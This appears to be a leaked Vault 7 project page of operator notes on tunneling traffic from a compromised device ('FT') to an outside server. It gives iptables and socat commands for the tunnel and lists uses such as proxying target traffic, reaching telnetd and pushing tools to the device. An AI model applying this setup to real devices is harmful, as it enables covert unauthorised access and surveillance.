Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
# enable NAT for TUN traffic
iptables -t nat -A POSTROUTING -s 10.129.0.0/16 -o eth0 -j SNAT --to 5.4.16.104
12-26-07 notes:
I had to apply the routing rules and then restart openvpn before I could ping both VIPs from the FT's
cmd line. I can only ping 10.129.66.1 from 5.4.16.104 (the server).
Since “-j MASQUERADE” doesn't support icmp, outbound pings do not have their SRC IP altered on
the server, and a reply will never be returned. Ideally, we would just use a -j DNAT rule with newer
versions of iptables.
#socat notes
#client/FT, note: add up to 4 -d's for more debug
insmod tun.o
./socat -d tcp:5.4.16.104:11443 tun:10.0.0.2/24,up &
#server
./socat -d -d TCP-LISTEN:11443,reuseaddr TUN:10.0.0.1/24,up &
Proxy Tunnel Uses
1. proxy target traffic
2. provide forward pinhole from server
3. provides a routable virtual IP or port to FT from the proxy server (in the case where the FT does
not have a public IP.
4. provide means to access FT web interface to reflash
5. provide means to access telnetd (if started from mm and there is a iptables rule that only allows
access to port 23 from the localhost traffic)
6. provide a means to transfer additional tools and libraries to the FT. e.g. libssl, dropbear,
Jeremy's routing app.
MM enhancements
1. add mission exec capability
2. add attachement capability
allows mm to exec attachement after written